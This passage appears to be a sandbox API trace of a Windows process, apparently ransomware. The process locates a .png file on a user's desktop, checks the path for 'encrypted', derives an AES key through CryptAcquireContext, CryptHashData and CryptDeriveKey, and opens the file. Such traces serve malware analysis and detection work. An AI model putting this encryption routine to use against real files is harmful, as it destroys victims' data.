wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.835] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0030.835] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0030.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.835] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.835] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.835] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.835] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.835] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602e3f0, ftCreationTime.dwHighDateTime=0x1d5c1df, ftLastAccessTime.dwLowDateTime=0x4adcad20, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x4adcad20, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x3153, dwReserved0=0x0, dwReserved1=0x777648, cFileName="DQ5aP.png", cAlternateFileName="")) returned 0x7c20c0 [0030.835] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.836] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.836] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602e3f0, ftCreationTime.dwHighDateTime=0x1d5c1df, ftLastAccessTime.dwLowDateTime=0x4adcad20, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x4adcad20, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x3153, dwReserved0=0x0, dwReserved1=0x777648, cFileName="DQ5aP.png", cAlternateFileName="")) returned 0x7c20c0 [0030.836] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0030.836] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.836] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DQ5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0030.837] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q5aP.png\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0030.837] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.837] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0030.838] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0030.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0030.838] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0030.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.838] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0030.838] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602e3f0, ftCreationTime.dwHighDateTime=0x1d5c1df, ftLastAccessTime.dwLowDateTime=0x4adcad20, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x4adcad20, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x3153, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="DQ5aP.png", cAlternateFileName="")) returned 0x7c2100 [0030.838] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0030.838] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.838] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.838] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0030.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0030.838] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.838] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0030.839] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0030.839] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.839] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0030.839] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.839] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.840] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.840] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.840] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0030.840] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0030.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.840] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0030.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.840] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.840] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0030.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.840] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.840] CryptDestroyHash (hHash=0x7c2240) returned 1 [0030.840] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\dq5ap.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0030.840] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0030.840] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0030.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0030.840] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0030.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0030.841] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0030.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0030.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.842] 